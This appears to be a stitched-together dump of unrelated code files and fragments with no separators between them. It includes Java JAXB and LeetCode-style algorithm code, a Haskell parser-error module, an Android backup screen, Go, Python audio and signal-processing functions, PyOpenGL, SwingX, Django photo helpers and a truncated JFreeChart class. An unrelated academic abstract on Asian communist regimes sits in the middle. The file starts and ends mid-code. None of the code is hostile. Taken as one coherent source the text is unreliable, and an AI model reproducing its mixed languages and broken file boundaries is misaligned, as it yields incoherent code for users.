            add1.getSemanticsText().setContent("Person.streetAddressLine1");
            jaxbe_add1 = of.createQUPAMT000001GB01QueryPersonStreetAddressLine1(add1);
        }
        return jaxbe_add1;
    }
}
module Mima.Asm.Weed
  ( Weed
  , runWeed
  , transformErrors
  , critical
  , harmless
  , WeedError(..)
  , errorWith
  -- * Megaparsec compatibility
  , defaultPosState
  , asParseErrors
  , runWeedBundle
  ) where

import qualified Data.List.NonEmpty as NE
import           Data.Monoid
import qualified Data.Set as Set

import           Text.Megaparsec

-- The star of the show
data Weed e a = Weed (Endo [e]) (Either e a)

instance Functor (Weed e) where
  fmap f (Weed e a) = Weed e $ fmap f a

instance Applicative (Weed e) where
  pure = Weed mempty . pure
  (Weed es1 (Left e1)) <*> (Weed es2 (Left e2)) = Weed (es1 <> Endo (e1:) <> es2) (Left e2)
  (Weed es1 f) <*> (Weed es2 a) = Weed (es1 <> es2) (f <*> a)

instance Monad (Weed e) where
  (Weed es1 v) >>= f = case f <$> v of
    Left e             -> Weed es1 (Left e)
    Right (Weed es2 a) -> Weed (es1 <> es2) a

runWeed :: Weed e a -> Either (NE.NonEmpty e) a
-- Since the Endos never remove an element and we add an extra
-- element, this list is never empty.
--
-- I've tried to figure out nicer types for this, but if I want to
-- keep the Endo trick, the tradeoff isn't worth it. The problem here
-- is that I can't easily check if 'es' is 'mempty' with these
-- endofunctors.
runWeed (Weed es (Left e))  = Left $ e NE.:| appEndo es []
runWeed (Weed es (Right a)) = case appEndo es [] of
  (x:xs) -> Left $ x NE.:| xs
  []     -> Right a

transformErrors :: (e1 -> e2) -> Weed e1 a -> Weed e2 a
transformErrors f (Weed es result) = Weed es' result'
  where
    es' = Endo $ (++) $ map f $ appEndo es []
    result' = case result of
      Right a -> Right a
      Left e  -> Left $ f e

critical :: e -> Weed e a
critical e = Weed mempty (Left e)

harmless :: e -> Weed e ()
harmless e = Weed (Endo (e:)) (Right ())

data WeedError a = WeedError a String
  deriving (Show)

instance Functor WeedError where
  fmap f (WeedError a s) = WeedError (f a) s

errorWith :: a -> String -> WeedError a
errorWith = WeedError

{- Megaparsec compatibility -}

defaultPosState :: FilePath -> s -> PosState s
defaultPosState filename input = PosState
  { pstateInput      = input
  , pstateOffset     = 0
  , pstateSourcePos  = initialPos filename
  , pstateTabWidth   = defaultTabWidth
  , pstateLinePrefix = ""
  }

asParseErrors :: Weed (WeedError Int) a -> Weed (ParseError s e) a
asParseErrors = transformErrors toParseError
  where
    toParseError (WeedError offset msg) =
      FancyError offset $ Set.singleton $ ErrorFail msg

runWeedBundle :: FilePath -> s -> Weed (ParseError s e) a -> Either (ParseErrorBundle s e) a
runWeedBundle filename input w = case runWeed w of
  Left errors -> Left $ ParseErrorBundle errors $ defaultPosState filename input
  Right a     -> Right a
package com.gacsoft.hiddenjournal;

import android.app.AlertDialog;
import android.content.DialogInterface;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.AdapterView;
import android.widget.ArrayAdapter;
import android.widget.ListAdapter;
import android.widget.ListView;
import android.widget.Toast;

import java.util.ArrayList;

public class ConfigActivity extends AppCompatActivity {
    private int id = -1;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_config);
        setTitle(R.string.options);

        ListView listView = (ListView) findViewById(R.id.list_view);
        listView.setOnItemClickListener(new AdapterView.OnItemClickListener() {
            @Override
            public void onItemClick(AdapterView<?> adapterView, View view, int position, long l) {
                id = position + 1; // ListView position starts from 0, backup id starts from 1
                itemClicked();
            }
        });
    }

    public void onResume() {
        super.onResume();
        ListView listView = (ListView) findViewById(R.id.list_view);
        ListAdapter listAdapter = new ArrayAdapter<String>(this, R.layout.entry_list_view, BackupManager.getBackupList());
        listView.setAdapter(listAdapter);
    }

    private void itemClicked() {
        new AlertDialog.Builder(this)
                .setTitle(R.string.loadBackup)
                .setMessage(R.string.confirmBackup)
                .setIcon(android.R.drawable.ic_dialog_alert)
                .setPositiveButton(android.R.string.yes, new DialogInterface.OnClickListener() {
                    public void onClick(DialogInterface dialog, int whichButton) {
                        loadBackup();
                    }
                })
                .setNegativeButton(android.R.string.no, null)
                .show();
    }

    private void loadBackup() {
        try {
            System.out.println(id);
            BackupManager.loadBackup(id);
            Toast.makeText(ConfigActivity.this, R.string.doneBackup, Toast.LENGTH_SHORT).show();
        } catch (java.io.IOException e) {
            Toast.makeText(ConfigActivity.this, R.string.failedBackup, Toast.LENGTH_SHORT).show();
        }
    }
}
package factory

import (
	"designpattern-factorymethod-golang/product"
	concrete "designpattern-factorymethod-golang/product/impl"
	"fmt"
)

func GetTransportType(quPassengers int) (product.ITransport, error) {
	if quPassengers >= 1 && quPassengers <= 5 {
		return concrete.NewTaxi(), nil
	}
	if quPassengers >= 6 && quPassengers <= 15 {
		return concrete.NewVan(), nil
	}
	if quPassengers >= 16 {
		return concrete.NewBus(), nil
	}
	return nil, fmt.Errorf("wrong quantity of passengers")
}
def untransform_target(self, mix, predicted_mask, index):
    mix_slice = [self.chopper.chop_n_pad(channel, index, self.size)
                 for channel in mix]
    mix_magnitude = np.abs(mix_slice)
    predicted_mask = np.clip(predicted_mask, 0, 1)
    predicted_mask_reshape = [predicted_mask[:, :, 0]]
    if self.stereo:
        predicted_mask_reshape.append(predicted_mask[:, :, 1])
    vocal_magnitude = mix_magnitude * predicted_mask_reshape
    vocals = vocal_magnitude * np.exp(np.angle(mix_slice) * 1j)
    return vocals, mix_slice - vocals
# These imports match the era of this code: older SciPy re-exported the NumPy
# namespace (sp.ones_like, sp.random, sp.complex128); on modern SciPy, use
# numpy and scipy.fft instead.
import scipy as sp
import scipy.fftpack as scfft


def MakePulseDataRep(pulse_shape, filt_freq, delay=16, rep=1, numtype=sp.complex128):
    npts = len(filt_freq)
    multforimag = sp.ones_like(filt_freq)
    hpnt = int(sp.ceil(npts / 2.))
    multforimag[hpnt:] = -1
    tmp = scfft.ifft(filt_freq)
    tmp[hpnt:] = 0.
    filt_tile = sp.tile(filt_freq[sp.newaxis, :], (rep, 1))
    shaperep = sp.tile(pulse_shape[sp.newaxis, :], (rep, 1))
    noisereal = sp.random.randn(rep, npts).astype(numtype)
    noiseimag = sp.random.randn(rep, npts).astype(numtype)
    # Complex white noise, scaled so each sample has unit power.
    noise_vec = (noisereal + 1j * noiseimag) / sp.sqrt(2.0)
    # Shape the noise spectrum with the filter, then return to the time domain.
    mult_freq = filt_tile.astype(numtype) * noise_vec
    data = scfft.ifft(mult_freq, axis=-1)
    # Apply the pulse envelope to a delayed slice of the filtered noise.
    data_out = shaperep * data[:, delay:(delay + len(pulse_shape))]
    return data_out
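A hypothetical call, assuming the legacy SciPy aliasing noted above: a boxcar pulse repeated over several noise realizations through a flat (all-pass) filter.

# Illustrative parameters only; the shapes are what matters here.
pulse = sp.ones(100)   # boxcar pulse envelope, 100 samples
filt = sp.ones(1000)   # flat filter frequency response, 1000 bins
reps = MakePulseDataRep(pulse, filt, delay=16, rep=50)
print(reps.shape)      # (50, 100): one filtered, enveloped pulse per repetition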
package com.zlz.util;

import java.util.*;

public class UtilAlg {
    public static String getHint(String secret, String guess) {
        int bulls = 0;
        int cows = 0;
        int[] numbers = new int[10];
        for (int i = 0; i < secret.length(); i++) {
            int s = secret.charAt(i) - '0';
            int g = guess.charAt(i) - '0';
            if (s == g) bulls++;
            else {
                // Count below 0: this digit appeared earlier in guess and matches secret's current digit.
                if (numbers[s] < 0) cows++;
                // Count above 0: this digit appeared earlier in secret and matches guess's current digit.
                if (numbers[g] > 0) cows++;
                // Digit from secret: increment its count.
                numbers[s]++;
                // Digit from guess: decrement its count.
                numbers[g]--;
            }
        }
        return bulls + "A" + cows + "B";
    }

    public static void main(String[] args) {
        System.out.println("keep Happy boy");
        PrintUtil.pLine();
        System.out.println(getHint("232", "321"));
    }

//    public static String getHint(String secret, String guess) {
//        int len = secret.length();
//        int[] secretarr = new int[10];
//        int[] guessarr = new int[10];
//        int bull = 0, cow = 0;
//        for (int i = 0; i < len; ++i) {
//            if (secret.charAt(i) == guess.charAt(i)) {
//                ++bull;
//            } else {
//                ++secretarr[secret.charAt(i) - '0'];
//                ++guessarr[guess.charAt(i) - '0'];
//            }
//        }
//        for (int i = 0; i < 10; ++i) {
//            cow += Math.min(secretarr[i], guessarr[i]);
//        }
//        return "" + bull + "A" + cow + "B";
//    }

    public static int findPositionToReplace(int[] a, int low, int high, int x) {
        int mid;
        while (low <= high) {
            mid = low + (high - low) / 2;
            if (a[mid] == x) return mid;
            else if (a[mid] > x) high = mid - 1;
            else low = mid + 1;
        }
        return low;
    }

    public static int lengthOfLIS(int[] nums) {
        // Short-circuit || so a null array is never dereferenced.
        if (nums == null || nums.length == 0) return 0;
        int n = nums.length, len = 0;
        int[] increasingSequence = new int[n];
        increasingSequence[len++] = nums[0];
        for (int i = 1; i < n; i++) {
            if (nums[i] > increasingSequence[len - 1]) increasingSequence[len++] = nums[i];
            else {
                int position = findPositionToReplace(increasingSequence, 0, len - 1, nums[i]);
                increasingSequence[position] = nums[i];
            }
        }
        return len;
    }

    public static int lengthOfLIS1(int[] nums) {
        int[] dp = new int[nums.length];
        Arrays.fill(dp, 1);
        int result1 = solve(nums, 0, Integer.MIN_VALUE);
        int result2 = solve(nums, dp);
        if (result1 != result2) {
            System.out.println(result1 + " " + result2);
        }
        return result1;
    }

    private static int solve(int[] nums, int[] dp) {
        int ans = 1, n = nums.length;
        for (int i = 0; i < n; i++)
            for (int j = 0; j < i; j++)
                if (nums[i] > nums[j]) {
                    dp[i] = Math.max(dp[i], dp[j] + 1);
                    ans = Math.max(ans, dp[i]);
                }
        return ans;
    }

    public static int solve(int[] nums, int i, int prev) {
        if (i >= nums.length) return 0;
        int take = 0, dontTake = solve(nums, i + 1, prev); // try skipping the current element
        if (nums[i] > prev) take = 1 + solve(nums, i + 1, nums[i]); // or pick it if it is greater than previous picked element
        int result = Math.max(take, dontTake); // return whichever choice gives max LIS
        return result;
    }

    public static void test_restoreIpAddresses(String[] args) {
        System.out.println("keep Happy boy");
        System.out.println(restoreIpAddresses("25525511135"));
    }

    public static List<String> restoreIpAddresses(String input) {
        List<String> result = new ArrayList<>();
        backtracking(input, 0, result, new StringBuilder(), 0);
        return result;
    }

    private static void backtracking(String input, int i, List<String> result, StringBuilder stringBuilder, int index) {
        if (index > 5) return;
        if (i > input.length() && index < 4) return;
        if (i == input.length() && index == 4) {
            result.add(stringBuilder.toString().substring(0, stringBuilder.toString().length() - 1));
        }
        for (int k = 1; k < 4; k++) {
            if (i + k > input.length()) return;
            String value = input.substring(i, i + k);
            if (validate(value, i)) {
                stringBuilder.append(value);
                stringBuilder.append(".");
                backtracking(input, i + k, result, stringBuilder, index + 1);
                int length = stringBuilder.length();
                stringBuilder.delete(length - value.length() - 1, length);
            } else {
                return;
            }
        }
    }

    private static boolean validate(String value, int index) {
        if (index == 0 && value.startsWith("0")) return false;
        Integer v = Integer.parseInt(value);
        if (v < 0 || v > 255) return false;
        return true;
    }

    public static void test_subsetsWithDup(String[] args) {
        System.out.println("keep Happy boy");
        System.out.println(subsetsWithDup(new int[]{1, 2, 3}));
        System.out.println(subsetsWithDup(new int[]{1, 2, 2}));
    }

    /**
     * We still follow the steps we planned out:
     * 1. Confirm input and output:
     * [1,2,2]
     * [[],[1],[1,2],[1,2,2],[2],[2,2]]
     * 2. Find the pattern:
     * 1,2,2
     * []
     * 1|2
     * 1,2|2,2
     * 1,2,2
     */
    public static List<List<Integer>> subsetsWithDup(int[] nums) {
        List<List<Integer>> result = new ArrayList<>();
        for (int i = 0; i <= nums.length; i++) {
            subsetsWithDup(nums, 0, i, result, new ArrayList<Integer>());
        }
        return result;
    }

    private static void subsetsWithDup(int[] nums, int i, int k, List<List<Integer>> result, ArrayList<Integer> es) {
        if (es.size() == k) {
            result.add(new ArrayList<>(es));
            return;
        } else {
            for (int j = i; j < nums.length; j++) {
                if (j > i && nums[j - 1] == nums[j]) continue;
                es.add(nums[j]);
                subsetsWithDup(nums, j + 1, k, result, es);
                es.remove(es.size() - 1);
            }
        }
    }

    public static void test_grayCode(String[] args) {
        System.out.println("keep Happy boy");
        System.out.println(grayCode(3));
    }

    /**
     * The backtracking itself is not the problem here; BitSet is the
     * unfamiliar data structure, and that is also the thing worth learning.
     */
    public static List<Integer> grayCode(int n) {
        List<Integer> res = new ArrayList<>();
        return helper(res, n, new BitSet());
    }

    private static List<Integer> helper(List<Integer> res, int n, BitSet chosen) {
        if (n == 0) {
            // all bits of chosen have been selected
            Integer va = convert(chosen);
            res.add(va);
        } else {
            helper(res, n - 1, chosen);
            chosen.flip(n - 1);
            helper(res, n - 1, chosen);
        }
        return res;
    }

    public static int convert(BitSet bits) {
        int value = 0;
        for (int i = 0; i < bits.length(); ++i) {
            value += bits.get(i) ? (1L << i) : 0L;
        }
        return value;
    }

    public static void test_exist(String[] args) {
        System.out.println("keep Happy boy");
        char[][] v = PrintUtil.costructCharArray("[[\"A\",\"B\",\"C\",\"E\"],[\"S\",\"F\",\"C\",\"S\"],[\"A\",\"D\",\"E\",\"E\"]]");
        System.out.println(exist(v, "ABCCEDA"));
        System.out.println(exist(v, "ABCCED"));
        v = PrintUtil.costructCharArray("[[\"a\",\"b\"],[\"c\",\"d\"]]");
        System.out.println(exist(v, "acdb"));
        v = PrintUtil.costructCharArray("[[\"C\",\"A\",\"A\"],[\"A\",\"A\",\"A\"],[\"B\",\"C\",\"D\"]]");
        System.out.println(exist(v, "AAB"));
    }

    /**
     * A variant of backtracking; start by drawing the grid:
     * ["A","B","C","E"],
     * ["S","F","C","S"],
     * ["A","D","E","E"]
     * <p>
     * ABCCED
     * <p>
     * To begin: what is the starting condition for the backtracking, and what
     * pruning conditions limit it?
     * <p>
     * [a,b]
     * [c,d]
     * <p>
     * acdb
     * <p>
     * [["C","A","A"],
     * ["A","A","A"],
     * ["B","C","D"]
     * <p>
     * AAB
     */
    public static boolean exist(char[][] board, String word) {
        boolean[][] visite = new boolean[board.length][board[0].length];
        for (int i = 0; i < board.length; i++) {
            for (int j = 0; j < board[0].length; j++) {
                if (exist(board, i, j, word, 0, visite)) return true;
            }
        }
        return false;
    }

    private static boolean exist(char[][] board, int i, int j, String word, int i1, boolean[][] visite) {
        if (word.charAt(i1) == board[i][j]) {
            if (i1 == word.length() - 1) {
                return true;
            } else {
                visite[i][j] = true;
                if (j < board[0].length - 1 && !visite[i][j + 1] && exist(board, i, j + 1, word, i1 + 1, visite)) return true;
                if (i < board.length - 1 && !visite[i + 1][j] && exist(board, i + 1, j, word, i1 + 1, visite)) return true;
                if (j > 0 && !visite[i][j - 1] && exist(board, i, j - 1, word, i1 + 1, visite)) return true;
                if (i > 0 && !visite[i - 1][j] && exist(board, i - 1, j, word, i1 + 1, visite)) return true;
                visite[i][j] = false;
            }
        }
        return false;
    }

    public static void test_subsets(String[] args) {
        System.out.println("keep Happy boy");
        System.out.println(subsets(new int[]{1, 2, 3}));
        System.out.println(subsets(new int[]{1}));
    }

    /**
     * nums = [1,2,3]
     * k=0, []
     * k=1, 1,2,3
     * k=2, 1,2|1,3|2,3
     * k=3, 1,2,3
     */
    public static List<List<Integer>> subsets(int[] nums) {
        List<List<Integer>> result = new ArrayList<>();
        for (int i = 0; i <= nums.length; i++) {
            subsets(nums, 0, i, result, new HashSet<Integer>());
        }
        return result;
    }

    private static void subsets(int[] nums, int i, int k, List<List<Integer>> result, HashSet<Integer> es) {
        if (es.size() == k) {
            result.add(new ArrayList<>(es));
            return;
        } else {
            for (int j = i; j < nums.length; j++) {
                es.add(nums[j]);
                subsets(nums, j + 1, k, result, es);
                es.remove(nums[j]);
            }
        }
    }

    public static void test_combine(String[] args) {
        System.out.println("keep Happy boy");
        List<List<Integer>> resul = combine(4, 2);
        PrintUtil.p(resul);
    }

    /**
     * The most standard recursive enumeration:
     * 1,2 | 1,3 | 1,4
     * 2,3 | 2,4
     * 3,4
     */
    public static List<List<Integer>> combine(int n, int k) {
        List<List<Integer>> result = new ArrayList<>();
        combine(n, 1, k, result, new HashSet<Integer>());
        return result;
    }

    private static void combine(int n, int i, int k, List<List<Integer>> result, HashSet<Integer> integers) {
        if (integers.size() == k) {
            result.add(new ArrayList<>(integers));
            return;
        } else {
            for (int j = i; j <= n; j++) {
                integers.add(j);
                combine(n, j + 1, k, result, integers);
                integers.remove(j);
            }
        }
    }

    public static void test_minWindow(String[] args) {
        System.out.println("keep Happy boy");
        System.out.println(minWindow("ADOBCAODEBANC", "ABC"));
        System.out.println(minWindow("ADOBECODEBANC", "ABC"));
    }

    /**
     * The pressing question is how the window is maintained. If we clear our
     * map at the first match and start over, we throw away everything matched
     * so far; the window can only jump from match to match instead of sliding
     * smoothly, which is not what the problem asks for.
     * <p>
     * So the problem we face is deciding what to update as the window slides;
     * we can start by listing what we already know:
     */
    public static String minWindow(String s, String t) {
        if (s.isEmpty() || t.isEmpty()) return "";
        Map<Character, Integer> need = new HashMap<>();
        t.chars().forEach(e -> need.put((char) e, need.getOrDefault((char) e, 0) + 1));
        int i = 0, j = 0, l = 0, r = 0, missing = t.length();
        while (r < s.length()) {
            char right = s.charAt(r);
            need.putIfAbsent(right, -1);
            // This check is the key: it is the condition that keeps the sliding window valid.
            if (need.get(right) > 0) {
                missing -= 1;
            }
            need.put(right, need.get(right) - 1);
            r += 1;
            while (missing == 0) { // maintain the window: shrink it as far as possible
                if (j == 0 || (r - l) < (j - i)) {
                    j = r;
                    i = l;
                }
                char left = s.charAt(l);
                need.putIfAbsent(left, -1);
                need.put(left, need.get(left) + 1);
                if (need.get(left) > 0) missing += 1;
                l += 1;
            }
        }
        return s.substring(i, j);
    }

    public static void test_sortColors(String[] args) {
        System.out.println("keep Happy boy");
        int[] a = PrintUtil.constractArray(3, 10, false);
        PrintUtil.p(Arrays.toString(a));
        sortColors(a);
        PrintUtil.p(Arrays.toString(a));
        a = new int[]{0};
        sortColors(a);
        PrintUtil.p(Arrays.toString(a));
        a = new int[]{1};
        sortColors(a);
        PrintUtil.p(Arrays.toString(a));
        a = new int[]{1, 0};
        sortColors(a);
        PrintUtil.p(Arrays.toString(a));
    }

    public static void sortColors(int[] nums) {
        int f0 = 0, e2 = nums.length - 1;
        for (int i = 0; i < nums.length; ) {
            // 0,2
            if (nums[i] == 2 && i < e2) {
                change(i, e2, nums);
                e2--;
            } else if (nums[i] == 0 && i > f0) {
                change(i, f0, nums);
                f0++;
            } else {
                i++;
            }
        }
    }

    private static void change(int i, int e2, int[] nums) {
        int tmp = nums[i];
        nums[i] = nums[e2];
        nums[e2] = tmp;
    }

    public static void test_searchMatrix(String[] args) {
        System.out.println("keep Happy boy");
        int[] a = PrintUtil.constractArray(10);
        PrintUtil.p(Arrays.toString(a));
        Arrays.sort(a);
        PrintUtil.p(Arrays.toString(a));
        System.out.println(findByDivedMethod(a, 45));
        int[][] tes = PrintUtil.costructIntArray("[[1,1]]");
        System.out.println(searchMatrix(tes, 2));
    }

    public static int findByDivedMethod(int[] a, int target) {
        // end starts at the last valid index; a.length would let mid run out of bounds.
        int f = 0, end = a.length - 1;
        while (f <= end) {
            int mid = f + (end - f) / 2;
            if (a[mid] == target) {
                return mid;
            } else if (a[mid] > target) {
                end = mid - 1;
            } else {
                f = mid + 1;
            }
        }
        return -1;
    }

    public static boolean searchMatrix(int[][] matrix, int target) {
        int f = 0, end = matrix[0].length * matrix.length - 1;
        while (f <= end) {
            int mid = f + (end - f) / 2;
            if (matrix[mid / matrix[0].length][mid % matrix[0].length] == target) {
                return true;
            } else if (matrix[mid / matrix[0].length][mid % matrix[0].length] > target) {
                end = mid - 1;
            } else {
                f = mid + 1;
            }
        }
        return false;
    }
}
Introduction to the Special Issue on Authoritarian Resilience of Communist Regimes in Asia

This special issue focuses on the resilience of the communist regimes in Laos, Cambodia, Vietnam, and China. Three decades after the collapse of the Soviet Bloc, all four have not only survived a hostile post-communist world dominated by liberal capitalism but thrived economically. The five articles in this special issue aim to build on existing scholarship on authoritarian resilience while contributing in the following ways. First, by adopting a regional framework, we hope to offer a fuller examination of the varieties of communist rule in Asia. After all, this is the only world region with such a large concentration of surviving communist parties. Second, while highlighting the critical role of revolutionary origins, our approach corrects the tendency in scholarship on democratic transition to neglect totalitarian legacies. Third, the articles support the institutionalist approach by showing how ruling parties are critical to authoritarian regimes; yet we also seek to balance historical legacies against contemporary developments and to analyze the interactions among ideologies, organizations, and resources.
def constructFunction(
    self, functionName, dll,
    resultType=ctypes.c_int, argTypes=(),
    doc=None, argNames=(),
    extension=None,
    deprecated=False,
    module=None,
    force_extension=False,
    error_checker=None,
):
    is_core = (not extension) or extension.split('_')[1] == 'VERSION'
    if (not is_core) and not self.checkExtension(extension):
        raise AttributeError("""Extension not available""")
    argTypes = [self.finalArgType(t) for t in argTypes]

    if force_extension or ((not is_core) and (not self.EXTENSIONS_USE_BASE_FUNCTIONS)):
        pointer = self.getExtensionProcedure(as_8_bit(functionName))
        if pointer:
            func = self.functionTypeFor(dll)(resultType, *argTypes)(pointer)
        else:
            raise AttributeError(
                """Extension %r available, but no pointer for function %r""" % (extension, functionName))
    else:
        func = ctypesloader.buildFunction(
            self.functionTypeFor(dll)(resultType, *argTypes),
            functionName,
            dll,
        )
    func.__doc__ = doc
    func.argNames = list(argNames or ())
    func.__name__ = functionName
    func.DLL = dll
    func.extension = extension
    func.deprecated = deprecated
    func = self.wrapLogging(
        self.wrapContextCheck(
            self.errorChecking(func, dll, error_checker=error_checker),
            dll,
        )
    )
    if MODULE_ANNOTATIONS:
        if not module:
            module = _find_module()
        if module:
            func.__module__ = module
    return func
package org.jdesktop.swingx.search;

import java.awt.event.ActionListener;
import java.beans.PropertyChangeEvent;

import javax.swing.JPopupMenu;
import javax.swing.JTextField;
import javax.swing.UIManager;

import org.jdesktop.swingx.plaf.AbstractUIChangeHandler;
import org.jdesktop.swingx.util.OS;

/**
 * TODO: comment
 *
 * @author Peter Weishapl <[email protected]>
 */
public class NativeSearchFieldSupport {
    public static final String FIND_POPUP_PROPERTY = "JTextField.Search.FindPopup";
    public static final String FIND_ACTION_PROPERTY = "JTextField.Search.FindAction";
    public static final String MAC_SEARCH_VARIANT = "search";
    public static final String MAC_TEXT_FIELD_VARIANT_PROPERTY = "JTextField.variant";
    public static final String CANCEL_ACTION_PROPERTY = "JTextField.Search.CancelAction";

    /**
     * @return <code>true</code> if we run Leopard and the Mac Look And Feel.
     */
    public static boolean isNativeSearchFieldSupported() {
        try {
            String versionString = System.getProperty("os.version");
            // Mac versions have the format 10.x or 10.x.x
            if (versionString.length() < 4) {
                return false;
            }
            // only the part 10.x is important
            versionString = versionString.substring(0, 4);

            return OS.isMacOSX() && Float.parseFloat(versionString) >= 10.5
                    && UIManager.getLookAndFeel().getName().equals("Mac OS X");
        } catch (Exception e) {
            // in case the os.version cannot be parsed, we are surely not
            // running mac os x.
            return false;
        }
    }

    public static void setSearchField(JTextField txt, boolean isSearchField) {
        // Leopard Hack: ensure property change event is triggered, if nothing
        // changes.
        if (isSearchField == isSearchField(txt)) {
            txt.putClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY, "_triggerevent_");
        } else if (isSearchField) {
            // if we have a search field here, register listener for ui changes
            // (leopard hack)
            uiChangeHandler.install(txt);
        } else {
            // if we don't have a search field, we don't need to listen anymore.
            uiChangeHandler.uninstall(txt);
        }

        if (isSearchField) {
            txt.putClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY, MAC_SEARCH_VARIANT);
            txt.putClientProperty("Quaqua.TextField.style", MAC_SEARCH_VARIANT);
        } else {
            txt.putClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY, "default");
            txt.putClientProperty("Quaqua.TextField.style", "default");
        }
    }

    public static boolean isSearchField(JTextField txt) {
        return MAC_SEARCH_VARIANT.equals(txt.getClientProperty(MAC_TEXT_FIELD_VARIANT_PROPERTY));
    }

    public static boolean isNativeSearchField(JTextField txt) {
        return isSearchField(txt) && isNativeSearchFieldSupported();
    }

    public static void setFindPopupMenu(JTextField txt, JPopupMenu popupMenu) {
        txt.putClientProperty(FIND_POPUP_PROPERTY, popupMenu);
    }

    public static JPopupMenu getFindPopupMenu(JTextField txt) {
        return (JPopupMenu) txt.getClientProperty(FIND_POPUP_PROPERTY);
    }

    public static void setFindAction(JTextField txt, ActionListener findAction) {
        txt.putClientProperty(FIND_ACTION_PROPERTY, findAction);
    }

    public static ActionListener getFindAction(JTextField txt) {
        return (ActionListener) txt.getClientProperty(FIND_ACTION_PROPERTY);
    }

    public static void setCancelAction(JTextField txt, ActionListener cancelAction) {
        txt.putClientProperty(CANCEL_ACTION_PROPERTY, cancelAction);
    }

    public static ActionListener getCancelAction(JTextField txt) {
        return (ActionListener) txt.getClientProperty(CANCEL_ACTION_PROPERTY);
    }

    private static final SearchFieldUIChangeHandler uiChangeHandler = new SearchFieldUIChangeHandler();

    private static final class SearchFieldUIChangeHandler extends AbstractUIChangeHandler {
        @Override
        public void propertyChange(PropertyChangeEvent evt) {
            JTextField txt = (JTextField) evt.getSource();
            // Leopard hack to make appear correctly in search variant when
            // changing LnF.
            setSearchField(txt, isSearchField(txt));
        }
    }
}
package osmedile.intellij.stringmanip.styles;

public class ToHyphenCaseAction extends AbstractCaseConvertingAction {
    public ToHyphenCaseAction() {
    }

    public ToHyphenCaseAction(boolean b) {
        super(b);
    }

    @Override
    public String transformByLine(String s) {
        Style from = Style.from(s);
        if (from == Style.HYPHEN_LOWERCASE) {
            return Style.UNDERSCORE_LOWERCASE.transform(from, s);
        }
        return Style.HYPHEN_LOWERCASE.transform(from, s);
    }
}
import xxhash
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext as _

__all__ = ('get_hash', 'get_photo_relations', 'validate_photo_file',
           'serialize_photo', 'default_photo_serializer')


def get_hash(input):
    h = xxhash.xxh32()
    h.update(input)
    return h.hexdigest()


def get_photo_relations():
    from .fields import PhotoField, ManyPhotosField, SortableManyPhotosField

    models_with_photos = []
    for model_cls in apps.get_models():
        for field in model_cls._meta.get_fields():
            if isinstance(field, (PhotoField, ManyPhotosField, SortableManyPhotosField)):
                models_with_photos.append((model_cls, field))
    return models_with_photos


def validate_photo_file(file):
    if not file.content_type.startswith('image/'):
        raise ValidationError(_('Invalid file type'))

    if file.size > settings.PHOTOSLIB_MAX_SIZE:
        raise ValidationError(_('Too big file size'))


def default_photo_serializer(photo, request=None):
    build_absolute_uri = request.build_absolute_uri if request is not None else lambda x: x
    return {
        'id': photo.id,
        'file': build_absolute_uri(photo.file.url),
        'thumb': build_absolute_uri(getattr(photo, settings.PHOTOSLIB_THUMB_FIELD).url),
        'sizes': dict({
            size: build_absolute_uri(getattr(photo, size).url)
            for size in settings.PHOTOSLIB_PHOTO_SIZES.keys()
        }),
    }


def serialize_photo(photo, request=None):
    if callable(settings.PHOTOSLIB_PHOTO_SERIALIZE_HANDLER):
        return settings.PHOTOSLIB_PHOTO_SERIALIZE_HANDLER(photo, request=request)
    return default_photo_serializer(photo, request=request)
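get_hash above wraps xxhash's 32-bit digest; a small illustrative call (the input bytes are made up):

# xxh32.update() accepts bytes; hexdigest() returns an 8-character hex string.
print(get_hash(b"some-photo-bytes"))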
/**
 * A data panel to plot data time series and xy charts.
 *
 * @author Jason P. Hanley
 * @author Drew Daugherty
 */
public abstract class ChartViz extends AbstractDataPanel {
  /**
   * The logger for this class.
   */
  static Log log = LogFactory.getLog(ChartViz.class.getName());

  /** the data panel property to control the legend visibility */
  private static final String DATA_PANEL_PROPERTY_SHOW_LEGEND = "showLegend";

  private static final double ADJUST_TIME_SCALE_TIMEOUT_SEC = 2.0;

  /**
   * The chart.
   */
  JFreeChart chart;

  /**
   * The xy plot for this chart.
   */
  XYPlot xyPlot;

  /**
   * The domain (horizontal) axis that contains a value. This will be a number
   * axis for an xy plot or a date axis for a timeseries plot.
   */
  ValueAxis domainAxis;

  /**
   * The range (vertical) axis that contains a number.
   */
  NumberAxis rangeAxis;

  /**
   * The component that renders the chart.
   */
  ChartPanel chartPanel;

  /**
   * The data set for the chart.
   */
  XYDataset dataCollection;

  /**
   * The legend for the series in the chart.
   */
  LegendTitle seriesLegend;

  /**
   * The container for the chart component.
   */
  JPanel chartPanelPanel;

  /**
   * A bit to indicate if we are plotting time series charts or x vs. y charts.
   */
  final boolean xyMode;

  /**
   * The timestamp for the last piece of data displayed.
   */
  long lastDataPostSysTime = -1;

  /**
   * The number of local data series.
   */
  int localSeries;

  /**
   * Data start time for the current post operation.
   */
  double postDataStartTime = Double.MAX_VALUE;

  /**
   * Data end time for the current post operation.
   */
  double postDataEndTime = 0.0;

  /**
   * Data record count for the current post operation.
   */
  long postDataCount = 0L;

  /**
   * Plot colors for each series.
   */
  HashMap<String, Color> colors;

  /**
   * Colors used for the series.
   */
  final static Color[] seriesColors = {Color.decode("#FF0000"), Color.decode("#0000FF"),
      Color.decode("#009900"), Color.decode("#FF9900"), Color.decode("#9900FF"),
      Color.decode("#FF0099"), Color.decode("#0099FF"), Color.decode("#990000"),
      Color.decode("#000099"), Color.black};

  /** a flag to control the legend visibility, defaults to true */
  private boolean showLegend;

  /**
   * Constructs a chart data panel in time series mode.
   */
  public ChartViz() {
    this(false);
  }

  /**
   * Constructs a chart data panel.
   *
   * @param xyMode if true in x vs. y mode, otherwise in time series mode
   */
  public ChartViz(boolean xyMode) {
    super();
    this.xyMode = xyMode;
    //lastTimeDisplayed = -1;
    colors = new HashMap<String, Color>();

    // show the legend by default
    showLegend = true;

    initChart();
    setDataComponent(chartPanelPanel);
  }

  /**
   * Create the chart and set up its UI.
   */
  private void initChart() {
    XYToolTipGenerator toolTipGenerator;
    if (xyMode) {
